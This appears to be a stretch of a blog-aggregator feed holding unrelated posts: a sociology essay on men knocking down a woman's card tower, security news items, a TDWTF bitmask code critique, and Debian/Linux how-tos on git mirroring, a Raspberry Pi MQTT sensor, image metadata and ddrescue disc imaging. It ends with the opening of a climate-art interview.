I began to construct. Four levels in, people around us began to take notice; a few snapped pictures. Six levels in, people began to stop, actively take pictures, and inquire as to my progress and motivation. Eight stories in, a small crowd emerged. Everyone remained cordial and polite. At this point it became clear that I was too short to continue building. In solidarity, one of my friends stood on a chair to encourage the build. We built the last three levels together, atop chairs, in the middle of the convention center. 

Where inquiries had been friendly in the early stages of building, the mood soon turned. The moment chairs were used to facilitate the building process was the moment nearly everyone in attendance began to take notice. As the final tier went up, objects began flying at my head. Although women remained cordial throughout, a fraction of the men in the crowd became more and more aggressive. Whispers of “I bet you $50 that you can’t knock it down” or “I’ll give you $20 if you go knock it down” were heard throughout. A man chatted with my husband, criticizing the structural integrity of the house and offering insight as to how his house would be better…if he were the one building. Finally, a group of very aggressive men began circling like vultures. One man chucked empty plastic cups from a few tables away. The card house was complete for a total of two minutes before it fell. The life of the tower ended as such:

Man: “Would you be mad if someone knocked it down?”

Me: “I’m the one who built it so I’m the one who gets to knock it down.”

Man: “What? You’re going to knock it down?”

The man proceeded to punch the right side of the structure; a quarter of the house fell. Before he could strike again, I stretched out my arms knocking down the remainder. A small curtsey followed, as if to say thank you for watching my performance. There was a mixture of cheers and boos. Cheers, I imagine from those who sat in nearby tables watching my progress throughout the night. Boos, I imagine, from those who were denied the pleasure of knocking down the structure themselves.

As an academic it is difficult to remove my everyday experiences from research analysis.  Likewise, as a gender scholar the aggression displayed by these men was particularly alarming. In an era of #metoo, we often speak of toxic masculinity as enacting masculine expectations through dominance, and even violence. We see men in power, typically white men, abuse this very power to justify sexual advances and sexual assault. We even see men justify mass shootings and attacks based on their perceived subordination and the denial of their patriarchal rights.

Yet toxic masculinity also exists on a smaller scale, in men’s everyday social worlds. Hegemonic masculinity is a more apt description for this destructive behavior, rather than outright violent behavior, as hegemonic masculinity describes a system of cultural meanings that gives men power — it is embedded in everything from religious doctrines, to wage structures, to mass media. As men learn hegemonic expectations by way of popular culture—from Humphrey Bogart to John Wayne—one cannot help but think of the famous line from the hyper-masculine Fight Club (1999), “I just wanted to destroy something beautiful.”

Power over women through hegemonic masculinity may best explain the actions of the men at Oktoberfest. Alcohol consumption at the event allowed men greater freedom to justify their destructive behavior. Daring one another to physically remove a product of female labor, and their surprise at a woman’s choice to knock the tower down herself, are both in line with this type of power over women through the destruction of something “beautiful”.

Physical violence is not always a key feature of hegemonic masculinity (Connell 1987: 184). When we view toxic masculinity on a smaller scale, away from mass shootings and other high-profile tragedies, we find a form of masculinity that embraces aggression and destruction in our everyday social worlds, but is often excused as being innocent or unworthy of discussion.

Sandra Loughrin is an Assistant Professor at the University of Nebraska at Kearney. Her research areas include gender, sexuality, race, and age.

(View original at https://thesocietypages.org/socimages)

Cory DoctorowTalking education and technology with the Future Trends Forum

“Science fiction writer and cyberactivist Cory Doctorow joined the Future Trends Forum to explore possibilities for technology and education.”

CryptogramWhite House Eliminates Cybersecurity Position

The White House has eliminated the cybersecurity coordinator position.

This seems like a spectacularly bad idea.

Worse Than FailureImprov for Programmers: Inventing the Toaster

We always like to change things up a little bit here at TDWTF, and thanks to our sponsor Raygun, we've got a chance to bring you a little treat, or at least something a little different.

We're back with a new podcast, but this one isn't a talk show or storytelling format, or even a radio play. Remy rounded up some of the best comedians in Pittsburgh who were also in IT, and bundled them up to do some improv, using articles from our site and real-world IT news as inspiration. It's… it's gonna get weird.

Thanks to Erin Ross, Ciarán Ó Conaire, and Josh Cox for lending their time and voices to this project.

Music: "Happy Happy Game Show" Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0 License http://creativecommons.org/licenses/by/3.0/

Raygun gives you a window into the real user-experience for your software. With a few minutes of setup, all the errors, crashes, and performance issues will be identified for you, all in one tool. Not only does it make your applications better, with Raygun APM, it proactively identifies performance issues and builds a workflow for solving them. Raygun APM sorts through the mountains of data for you, surfacing the most important issues so they can be prioritized, triaged and acted on, cutting your Mean Time to Resolution (MTTR) and keeping your users happy.

Now’s the time to sign up. In a few minutes, you can have a build of your app with Raygun integration, and you’ll be surprised at how many issues it can identify. There’s nothing to lose with a 14-day free trial, and there are pricing options available that fit any team size.

[Advertisement] Continuously monitor your servers for configuration changes, and report when there's configuration drift. Get started with Otter today!

Planet Linux AustraliaMichael Still: How to maintain a local mirror of ONAP’s git repositories

Share

For various reasons, I like to maintain a local mirror of git repositories I use a lot, in this case ONAP. This is mostly because of the generally poor network connectivity in Australia, but it's also because it makes cloning a new repository super fast.

Tony Breeds and I baked up a script to do this for OpenStack repositories a while ago. I therefore present a version of that mirror script which does the right thing for ONAP projects.

One important thing to note here that differs from OpenStack — ONAP projects aren’t named in a way where they will consistently sit in a directory structure together. For example, there is an “oom” repository, as well as an “oom/registrator” repository. We therefore need to normalise repository names on clone to ensure they don’t clobber each other — I do that by replacing path separators with underscores.

So here’s the script:

#!/usr/bin/env python

from __future__ import print_function

import datetime
import json
import os
import subprocess
import random
import requests

ONAP_GIT_BASE = 'ssh://mikal@gerrit.onap.org:29418'


def get_onap_projects():
    data = subprocess.check_output(
               ['ssh', 'gerrit.onap.org', 'gerrit',
                'ls-projects']).split('\n')
    for project in data:
        yield (ONAP_GIT_BASE, project,
               'onap/%s' % project.replace('/', '_'))


def _ensure_path(path):
    if not path:
        return

    full = []
    for elem in path.split('/'):
        full.append(elem)
        if not os.path.exists('/'.join(full)):
            os.makedirs('/'.join(full))


starting_dir = os.getcwd()
projects = list(get_onap_projects())
random.shuffle(projects)

for base_url, project, subdir in projects:
    print('%s Considering %s %s'
          %(datetime.datetime.now(), base_url, project))
    os.chdir(os.path.abspath(starting_dir))

    if os.path.isdir(subdir):
        os.chdir(subdir)

        print('%s Updating %s'
              %(datetime.datetime.now(), project))
        try:
            subprocess.check_call(
                ['git', 'remote', '-vvv', 'update'])
        except Exception as e:
            print('%s FAILED: %s'
                  %(datetime.datetime.now(), e))
    else:
        git_url = os.path.join(base_url, project)
        _ensure_path('/'.join(subdir.split('/')[:-1]))

        print('%s Cloning %s'
              %(datetime.datetime.now(), project))
        subprocess.check_call(
            ['ionice', '-c', 'idle', 'git', 'clone',
             '-vvv', '--mirror', git_url, subdir])

Note that your ONAP gerrit username probably isn’t “mikal”, so you might want to change that.

This script will checkout all ONAP git repositories into a directory named “onap” in your current working directory. A second run will add any new repositories, as well as updating the existing ones. Note that these are clones intended to be served with a local git server, instead of being clones you’d edit directly. To clone one of the mirrored repositories for development, you would then do something like:

$ git clone onap/aai_babel development/aai_babel

Or similar.
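
To actually serve these mirrors on the local network, the stock git daemon is sufficient. A minimal sketch, assuming the onap directory lives under /srv/mirror:

git daemon --base-path=/srv/mirror --export-all --reuseaddr --verbose

after which clones work against git://yourhost/onap/aai_babel and friends.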

Share

The post How to maintain a local mirror of ONAP’s git repositories appeared first on Made by Mikal.

,

Planet DebianJonathan McDowell: Home Automation: Raspberry Pi as MQTT temperature sensor

After setting up an MQTT broker I needed some data to feed it. It made sense to start basic and gradually build up bits and pieces that would form a bigger home automation setup. As it happened I have an old Raspberry Pi B (original rev 1 [2 if you look at /proc/cpuinfo] with 256MB RAM) and some DS18B20 1-Wire temperature sensors lying around, so I decided to make a heavyweight temperature sensor (long term I’m hoping to do something with some ESP8266s).

There are plenty of guides out there about hooking up the DS18B20 to the Pi; Adafruit has a reasonable one. The short version is that GPIO4 can be easily configured to be a 1-Wire bus and you hook the DS18B20 up with a 4k7Ω resistor across the data + 3v3 power pins. An initial check can be performed by enabling the DT overlay on the fly:

sudo dtoverlay w1-gpio

Detection of 1-Wire devices is automatic so you should see an entry in dmesg looking like:

w1_master_driver w1_bus_master1: Attaching one wire slave 28.012345678abcd crc ef

You can then do

$ cat /sys/bus/w1/devices/28-*/w1_slave
1e 01 4b 46 7f ff 0c 10 18 : crc=18 YES
1e 01 4b 46 7f ff 0c 10 18 t=17875

Which shows a current temperature of 17.875°C in my study. Once that’s working (and you haven’t swapped GND and DATA like I did on the first go) you can make the Pi boot up with 1-Wire enabled by adding a dtoverlay=w1-gpio line to /boot/config.txt. The next step is to get that fed into the MQTT broker. A simple Python client seemed like the right approach. Debian has paho-mqtt but sadly not in a stable release. Thankfully the python3-paho-mqtt 1.3.1-1 package in testing installed just fine on the Raspbian stretch image my Pi is running. I dropped the following in /usr/local/sbin/mqtt-temp:

#!/usr/bin/python3

import glob
import time
import paho.mqtt.publish as publish

Broker = 'mqtt-host'
auth = {
    'username': 'user2',
    'password': 'bar',
}

pub_topic = 'test/temperature'

base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28-*')[0]
device_file = device_folder + '/w1_slave'

def read_temp():
    valid = False
    temp = 0
    with open(device_file, 'r') as f:
        for line in f:
            if line.strip()[-3:] == 'YES':
                valid = True
            temp_pos = line.find(' t=')
            if temp_pos != -1:
                temp = float(line[temp_pos + 3:]) / 1000.0

    if valid:
        return temp
    else:
        return None


while True:
    temp = read_temp()
    if temp is not None:
        publish.single(pub_topic, str(temp),
                hostname=Broker, port=8883,
                auth=auth, tls={})
    time.sleep(60)

And finished it off with a systemd unit file - I know a lot of people complain about systemd, but it really does make it easy to just spin up a minimal service as a unique non-privileged user. The following went in /etc/systemd/system/mqtt-temp.service:

[Unit]
Description=MQTT Temperature sensor
After=network.target

[Service]
# Hack because Python can't cope with a DynamicUser with no HOME
Environment="HOME=/"
ExecStart=/usr/local/sbin/mqtt-temp

DynamicUser=yes
MemoryDenyWriteExecute=true
PrivateDevices=true
ProtectKernelTunables=true
ProtectControlGroups=true
RestrictRealtime=true
RestrictAddressFamilies=AF_INET AF_INET6 AF_UNIX
RestrictNamespaces=true

[Install]
WantedBy=multi-user.target

Start it up and enable for subsequent reboots:

systemctl start mqtt-temp
systemctl enable mqtt-temp

And then watch on my Debian test box as before:

$ mosquitto_sub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -v -t '#' -u user1 -P foo
test/temperature 17.875
test/temperature 17.937
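
If no messages show up, the service logs are the first place to look; since the unit runs as a DynamicUser there is nothing in a home directory to inspect, but the usual systemd tools work fine (a quick sketch):

systemctl status mqtt-temp
journalctl -u mqtt-temp -f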

Planet DebianJonathan Carter: Video Channel Updates

Last month, I started doing something that I’ve been meaning to do for years, and that’s to start a video channel and make some free software related videos.

I started out uploading to my YouTube channel which has been dormant for a really long time, and then last week, I also uploaded my videos to my own site, highvoltage.tv. It’s a MediaDrop instance, a video hosting platform written in Python.

I’ll still keep uploading to YouTube, but ultimately I’d like to make my self-hosted site the primary source for my content. Not sure if I’ll stay with MediaDrop, but it does tick a lot of boxes, and if it’s easy enough to extend, I’ll probably stick with it. MediaDrop might also be a good platform for viewing Debian meeting videos such as the DebConf videos.

My current topics are very much Debian related, but that doesn’t exclude any other types of content from being included in the future. Here’s what I have so far:

  • Video Logs: Almost like a blog, in video format.
  • Howto: Howto videos.
  • Debian Package of the Day: Exploring packages in the Debian archive.
  • Debian Package Management: Howto series on Debian package management, a precursor to a series that I’ll do on Debian packaging.
  • What’s the Difference: Just comparing 2 or more things.
  • Let’s Internet: Read stuff from Reddit, Slashdot, Quora, blogs and other media.

It’s still early days and there’s a bunch of ideas that I still want to implement, so the content will hopefully get a lot better as time goes on.

I have also quit Facebook last month, so I dusted off my old Mastodon account and started posting there again: https://mastodon.xyz/@highvoltage

You can also subscribe to my videos via RSS: https://highvoltage.tv/latest.xml

Other than that I’m open to ideas, thanks for reading :)

Planet DebianShirish Agarwal: FOSS game community slump and question about getting images in palepeli

There is a thread in freegamedev.net which I have been following for the past few weeks.

In the back-and-forth there, I believe most of the arguments shared were somewhat wrong.

While we have AAA projects like 0ad and others, the mainstay of our games should be ones which don’t need any high-quality textures and still do the job.

I have been looking at a Let’s play playlist of an indie gem called ‘Dead in Vinland’

Youtube playlist link – https://www.youtube.com/playlist?list=PL8eo1fAeRpyl47_TRuQrtkBn2bNRaZtlT

If you look at the game, it doesn’t have much in terms of animation apart from bits of role-playing in encounters, and is more oriented towards dice rolls.

The characters in the game are essentially cut-out characters, very much like the cut-out cardboard/paperboard characters that we used to play with as children.

Where the game innovates is more in terms of an expansive dialog tree and, at most, 100-200 images of the characters. It basically has a group of 4 permanent characters; if any one of them dies, the gamer is defeated.

If anybody has played Rogue or any of the games in the new Debian games-rogue task, they would know that FOSS offers a variety of stories even in the RPG world.

$ aptitude show games-rogue
Package: games-rogue
Version: 2.3
State: installed
Automatically installed: no
Priority: optional
Section: metapackages
Maintainer: Debian Games Team
Architecture: all
Uncompressed Size: 24.6 k
Depends: games-tasks (= 2.3)
Recommends: allure, angband, crawl, gearhead, gearhead2, hearse, hyperrogue, lambdahack, meritous, moria, nethack-x11, omega-rpg, slashem
Description: Debian's roguelike games
This metapackage will install dungeon crawling games in the spirit of Rogue.
Homepage: https://blends.debian.org/games/tasks/

I picked RPGs because those are the kind of games I have always liked, especially turn-based RPGs, although I do hate the fact that I can’t save-scum the way I can in most traditional RPGs.

Variety and Palapeli

I now turn my attention to a package called variety.

While looking at it, I also pushed a wishlist bug for packaging the new version, which would fix a bug I reported about a month back. It was in the same conversation that I came to know that the upstream releaser and the downstream maintainer are one and the same.

I have also been talking with upstream about various features or what could be done to make variety better.

Now while that’s all well and good, and variety does a good job of being a wallpaper changer, I want the wallpapers that variety outputs to become the input of palapeli, but without the large amount of manual intervention it currently requires. Variety does a pretty good job of providing good-quality wallpapers and even goes further by giving quite a bit of information about them, as it saves the metadata of the images, unlike many online image services. To make things easier for myself, I made a directory called Variety in Pictures and copied everything from ~/.config/variety/Favorites by doing –

~/.config/variety/Favorites$ cp -r --preserve . /home/shirish/Pictures/Variety/

And this method works out well enough. The --preserve option is essential, as can be seen from the cp manpage –

--preserve[=ATTR_LIST]
preserve the specified attributes (default: mode,ownership,timestamps), if possible additional
attributes: context, links, xattr, all

The metadata of the images is good enough too, as can be seen from any random picture –

~/Pictures/Variety$ exiftool 7527881664_024e44f8bf_o.jpg
ExifTool Version Number : 10.96
File Name : 7527881664_024e44f8bf_o.jpg
Directory : .
File Size : 1175 kB
File Modification Date/Time : 2018:04:09 03:56:15+05:30
File Access Date/Time : 2018:05:14 22:59:22+05:30
File Inode Change Date/Time : 2018:05:15 08:01:42+05:30
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Image Description :
Make : Canon
Camera Model Name : Canon EOS 5D
X Resolution : 240
Y Resolution : 240
Resolution Unit : inches
Software : Adobe Photoshop Lightroom 3.6 (Windows)
Modify Date : 2012:07:08 17:58:13
Artist : Peter Levi
Copyright : Peter Levi
Exposure Time : 1/50
F Number : 7.1
Exposure Program : Aperture-priority AE
ISO : 160
Exif Version : 0230
Date/Time Original : 2011:05:03 12:17:50
Create Date : 2011:05:03 12:17:50
Shutter Speed Value : 1/50
Aperture Value : 7.1
Exposure Compensation : 0
Max Aperture Value : 4.0
Metering Mode : Multi-segment
Flash : Off, Did not fire
Focal Length : 45.0 mm
User Comment :
Focal Plane X Resolution : 3086.925795
Focal Plane Y Resolution : 3091.295117
Focal Plane Resolution Unit : inches
Custom Rendered : Normal
Exposure Mode : Auto
White Balance : Auto
Scene Capture Type : Standard
Owner Name : Tsvetan ROUSTCHEV
Serial Number : 1020707385
Lens Info : 24-105mm f/?
Lens Model : EF24-105mm f/4L IS USM
XP Comment :
Compression : JPEG (old-style)
Thumbnail Offset : 908
Thumbnail Length : 18291
XMP Toolkit : XMP Core 4.4.0-Exiv2
Creator Tool : Adobe Photoshop Lightroom 3.6 (Windows)
Metadata Date : 2012:07:08 17:58:13+03:00
Lens : EF24-105mm f/4L IS USM
Image Number : 1
Flash Compensation : 0
Firmware : 1.1.1
Format : image/jpeg
Version : 6.6
Process Version : 5.7
Color Temperature : 4250
Tint : +8
Exposure : 0.00
Shadows : 2
Brightness : +65
Contrast : +28
Sharpness : 25
Luminance Smoothing : 0
Color Noise Reduction : 25
Chromatic Aberration R : 0
Chromatic Aberration B : 0
Vignette Amount : 0
Shadow Tint : 0
Red Hue : 0
Red Saturation : 0
Green Hue : 0
Green Saturation : 0
Blue Hue : 0
Blue Saturation : 0
Fill Light : 0
Highlight Recovery : 23
Clarity : 0
Defringe : 0
Gray Mixer Red : -8
Gray Mixer Orange : -17
Gray Mixer Yellow : -21
Gray Mixer Green : -25
Gray Mixer Aqua : -19
Gray Mixer Blue : +8
Gray Mixer Purple : +15
Gray Mixer Magenta : +4
Split Toning Shadow Hue : 0
Split Toning Shadow Saturation : 0
Split Toning Highlight Hue : 0
Split Toning Highlight Saturation: 0
Split Toning Balance : 0
Parametric Shadows : 0
Parametric Darks : 0
Parametric Lights : 0
Parametric Highlights : 0
Parametric Shadow Split : 25
Parametric Midtone Split : 50
Parametric Highlight Split : 75
Sharpen Radius : +1.0
Sharpen Detail : 25
Sharpen Edge Masking : 0
Post Crop Vignette Amount : 0
Grain Amount : 0
Color Noise Reduction Detail : 50
Lens Profile Enable : 1
Lens Manual Distortion Amount : 0
Perspective Vertical : 0
Perspective Horizontal : 0
Perspective Rotate : 0.0
Perspective Scale : 100
Convert To Grayscale : True
Tone Curve Name : Medium Contrast
Camera Profile : Adobe Standard
Camera Profile Digest : 9C14C254921581D1141CA0E5A77A9D11
Lens Profile Setup : LensDefaults
Lens Profile Name : Adobe (Canon EF 24-105mm f/4 L IS USM)
Lens Profile Filename : Canon EOS-1Ds Mark III (Canon EF 24-105mm f4 L IS USM) - RAW.lcp
Lens Profile Digest : 0387279C5E7139287596C051056DCFAF
Lens Profile Distortion Scale : 100
Lens Profile Chromatic Aberration Scale: 100
Lens Profile Vignetting Scale : 100
Has Settings : True
Has Crop : False
Already Applied : True
Document ID : xmp.did:8DBF8F430DC9E11185FD94228EB274CE
Instance ID : xmp.iid:8DBF8F430DC9E11185FD94228EB274CE
Original Document ID : xmp.did:8DBF8F430DC9E11185FD94228EB274CE
Source URL : https://www.flickr.com/photos/93647178@N00/7527881664
Source Type : flickr
Author : peter-levi
Source Name : Flickr
Image URL : https://farm9.staticflickr.com/8154/7527881664_024e44f8bf_o.jpg
Author URL : https://www.flickr.com/photos/93647178@N00
Source Location : user:www.flickr.com/photos/peter-levi/;user_id:93647178@N00;
Creator : Peter Levi
Rights : Peter Levi
Subject : paris, france, lyon, lyonne
Tone Curve : 0, 0, 32, 22, 64, 56, 128, 128, 192, 196, 255, 255
History Action : derived, saved
History Parameters : converted from image/x-canon-cr2 to image/jpeg, saved to new location
History Instance ID : xmp.iid:8DBF8F430DC9E11185FD94228EB274CE
History When : 2012:07:08 17:58:13+03:00
History Software Agent : Adobe Photoshop Lightroom 3.6 (Windows)
History Changed : /
Derived From :
Displayed Units X : inches
Displayed Units Y : inches
Current IPTC Digest : 044f85a540ebb92b9514cab691a3992d
Coded Character Set : UTF8
Application Record Version : 4
Date Created : 2011:05:03
Time Created : 12:17:50+03:00
Digital Creation Date : 2011:05:03
Digital Creation Time : 12:17:50+03:00
By-line : Peter Levi
Copyright Notice : Peter Levi
Headline : IMG_0779
Keywords : paris, france, lyon, lyonne
Caption-Abstract :
Photoshop Thumbnail : (Binary data 18291 bytes, use -b option to extract)
IPTC Digest : d8a6ddc0b5eacb05874d4b676f4cb439
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1920
Image Height : 1280
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Aperture : 7.1
Date/Time Created : 2011:05:03 12:17:50+03:00
Digital Creation Date/Time : 2011:05:03 12:17:50+03:00
Image Size : 1920x1280
Megapixels : 2.5
Scale Factor To 35 mm Equivalent: 1.0
Shutter Speed : 1/50
Thumbnail Image : (Binary data 18291 bytes, use -b option to extract)
Circle Of Confusion : 0.030 mm
Field Of View : 43.5 deg
Focal Length : 45.0 mm (35 mm equivalent: 45.1 mm)
Hyperfocal Distance : 9.51 m
Lens ID : Canon EF 24-105mm f/4L IS USM
Light Value : 10.6

One of the things I found wanting is a field for the licence, e.g. CC-SA 3.0 (Creative Commons Share-Alike 3.0), though I don’t know whether such a field exists. Apart from that, it has everything needed to know how a particular picture is/was taken.

For the puzzle, palapeli needs at least three pieces of information:

a. The name of the image. For many images you need to make one up, as many a time photographers are either not imaginative or do not have the time to give a meaningful, descriptive name. I have had an interesting discussion on a similar topic with the authors of palapeli. There is a lot to be done to get descriptions right. At least in free software I don’t know of any way to get images processed so that descriptions can be generated or discovered.

b. A comment – This is optional, but if you have captured a memorable image, this is the best way to record that. I hate to bring up Bing wallpapers, but I have seen that they have some of the best descriptions of the kind of thing I’m trying to say –

shirish@debian:~/Pictures/Variety$ exiftool ManateeMom_EN-US9983570199_1920x1080.jpg | grep Caption-Abstract
Caption-Abstract : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)
shirish@debian:~/Pictures/Variety$ exiftool ManateeMom_EN-US9983570199_1920x1080.jpg | grep Comment
User Comment : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)
XP Comment :
Comment : West Indian manatee mom and baby at Three Sisters Springs, Florida (© James R.D. Scott/Getty Images)

c. Name of the author – Many a time I just write either ‘nameless’ or ‘unknown’, as the author hasn’t taken any pains to share who they are.

The reason I have shared or talked about palapeli is that its authors are the only ones I know of who have done extensive work on unique slicers, so that the shapes of the puzzle pieces all come out different. But it’s still a trial-and-error method, as there is no preview mode.

While there’s a lot that could be improved in both of the above projects, for the moment I would be happy just to have a script which can take the images as input, add or fib the details (although it would be best to have actual details), and do the work.
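
As a rough sketch of the kind of script I have in mind – the tag values are obviously fibbed, and only standard exiftool tags that appear in the dumps above are used – something like this would backfill the missing author and comment fields:

#!/bin/sh
# fill in empty Artist and Comment tags on the variety favourites (sketch only)
for img in ~/Pictures/Variety/*.jpg; do
    if [ -z "$(exiftool -s3 -Artist "$img")" ]; then
        exiftool -overwrite_original -Artist='unknown' "$img"
    fi
    if [ -z "$(exiftool -s3 -Comment "$img")" ]; then
        exiftool -overwrite_original -Comment='wallpaper saved from variety' "$img"
    fi
done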

I am sure that if I put my mind to it, I’ll probably find ways in which even exiftool could be improved, but I can’t thank the people who have made such a wonderful tool enough.

For instance, while looking at the metadata of quite a few pictures, I found that many people use arbitrary fields to say where the picture was shot: some use Headline, some use Comment or Description, while others use Subject. If somebody wanted to write a script it would be difficult, as there may be images which have all three fields with different content in them, in a context known only to the author.
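
To see at a glance which of those fields each image actually carries, exiftool can dump them side by side (nothing exotic here, just its stock -csv output):

exiftool -csv -Headline -Comment -Description -Subject ~/Pictures/Variety/*.jpg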

The good thing is we have got the latest version on Debian testing –

$ exiftool -ver
10.96

Peace out.

Planet DebianJonathan Dowland: Imaging DVD-Rs, Step 2: Initial Import

This is part 2 in a series about a project to read/import a large collection of home-made optical media. Part 1 was Imaging DVD-Rs: Overview and Step 1; the summary page for the whole project is imaging discs.

Last time we prepared for the import by gathering all our discs together and organising storage for them in two senses: real-world (i.e. spindles) and a more future-proof digital storage system for the data, in my case, a NAS. This time we're actually going to read some discs. I suggest doing a quick first pass over your collection to image all the trouble-free discs (and identify the ones that are going to be harder to read). We will return to the troublesome ones in a later part.

For reading home-made optical discs, you could simply use cp:

cp /dev/sr0 disc-image.iso

This has the attraction of being a very simple solution but I don't recommend it, because of a lack of options for error handling. Instead I recommend using GNU ddrescue. It is designed to be fault tolerant and retries bad sectors in various ways to try and coax every last byte out of the medium. Crucially, a partially imported disc image can be further added to by subsequent runs of ddrescue, even on a separate computer.

For the first import, I recommend the suggested options from the ddrescue manual:

ddrescue -n -b2048 /dev/cdrom cdimage.iso cdimage.log

This will create a cdimage.iso file, hopefully containing your data, and a map file cdimage.log, describing what ddrescue managed to achieve. You should archive both!

This will either complete reasonably quickly (within one to two minutes), or will run potentially indefinitely. Once you've got a feel for how long a successful extraction takes, I'd recommend terminating any attempt that lasts much longer than that, and putting those discs to one side in a "needs attention" pile, to be re-attempted later. If ddrescue does finish, it will tell you if it couldn't read any of the disc. If so, put that disc in the "needs attention" pile too.
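(Peeking ahead a little: for the discs in that pile, the ddrescue manual suggests a follow-up pass in direct-access mode over the same image and map file; something along these lines, where -d asks for direct disc access and -r3 retries bad areas a few more times:)

ddrescue -d -r3 -b2048 /dev/cdrom cdimage.iso cdimage.log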

commercially-made discs

Above, I wrote that I recommend this approach for home-made data discs. Broadly, I am assuming that such discs use a limited set of options and features available to disc authors: they'll either be single session, or multisession but you aren't interested in any files that are masked by later sessions; they won't be mixed mode (no Audio tracks); there won't be anything unusual or important stored in the disc metadata, title, or subcodes; etcetera.

This is not always the case for commercial discs, or audio CDs or video DVDs. For those, you may wish to recover more information than is available to you via ddrescue. These aren't my focus right now, so I don't have much advice on how to handle them, although I might in the future.

labelling and storing images

If your discs are labelled as poorly or inconsistently as mine, it might not be obvious what filename to give each disc image. For my project I decided to append a new label to all imported discs, something like "blahX", where X is an incrementing number. So, for a fifth disc being imported with the label "my files", the image name would be my_files.blah5.iso. If you are keeping the physical discs after importing them, you could also mark the disc with "blah5".

where are we now

You should now have a pile of discs that you have successfully imported, a corresponding collection of disc image files/ddrescue log file pairs, and possibly a pile of "needs attention" discs.

In future parts, we will look at how to explore what's actually on the discs we have imaged: how to handle partially read or corrupted disc images; how to map the files on a disc to the sectors you have read, to identify which files are corrupted; and how to try to coax successful reads out of troublesome discs.

CryptogramAccessing Cell Phone Location Information

The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant:

The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically used by marketers and other companies to get location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon, documents show.

Another article.

Boing Boing post.

Worse Than FailureCodeSOD: Return of the Mask

Sometimes, you learn something new, and you suddenly start seeing it show up anywhere. The Baader-Meinhof Phenomenon is the name for that. Sometimes, you see one kind of bad code, and the same kind of bad code starts showing up everywhere. Yesterday we saw a nasty attempt to use bitmasks in a loop.

Today, we have Michele’s contribution, of a strange way of interacting with bitmasks. The culprit behind this code was a previous PLC programmer, even if this code wasn’t running straight on the PLC.

public static bool DecodeBitmask(int data, int bitIndex)
{
        var value = data.ToString();
        var padding = value.PadLeft(8, '0');
        return padding[bitIndex] == '1';
}

Take a close look at the parameters there- data is an int. That’s about what you’d expect here… but then we call data.ToString() which is where things start to break down. We pad that string out to 8 characters, and then check and see if a '1' happens to be in the spot we’re checking.

This, of course, defeats the entire purpose and elegance of bit masks, and worse, doesn’t end up being any more readable. Passing a number like 2 isn’t going to return true for any index.

Why does this work this way?

Well, let’s say you wanted a bitmask in the form 0b00000111. You might say, “well, that’s a 7”. What Michele’s predecessor said was, "that’s text… "00000111". But the point of bitmasks is to use an int to pass data around, so this developer went ahead and turned "00000111" into an integer by simply parsing it, creating the integer 111. But there’s no possible way to check if a certain digit is 1 or not, so we have to convert it back into a string to check the bitmask.
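For contrast, the usual way to test a bit (purely illustrative, not code from Michele’s codebase) is a single bitwise operation; note that it counts bits from the least significant end, unlike the string-indexing version above:

public static bool IsBitSet(int data, int bitIndex)
{
        // Conventional bitmask check: shift a 1 into position and AND it with the data.
        return (data & (1 << bitIndex)) != 0;
}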

Unfortunately, the software is so fragile and unreliable that no one is willing to let the developers make any changes beyond “it’s on fire, put it out”.

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

,

LongNowThe Role of Art in Addressing Climate Change: An interview with José Luis de Vicente

“Sounds super depressing,” she texted. “That’s why I haven’t gone. Sort of went full ostrich.”

That was my friend’s response when I asked her if she had attended Després de la fi del món (After the End of the World), the exhibition on the present and future of climate change at the Center of Contemporary Culture in Barcelona (CCCB).

Burying one’s head in the sand when it comes to climate change is a widespread impulse. It is, to put it brusquely, a bummer story — one whose drama is slow-moving, complex, and operating at planetary scale. The media, by and large, underreports it. Politicians who do not deny its existence struggle to coalesce around long-term solutions. And while a majority of people are concerned about climate change, few talk about it with friends and family.

Given all of this, it would seem unlikely that art, of all things, can make much of a difference in how we think about that story.

José Luis de Vicente, the curator of Després de la fi del món, believes that it can.

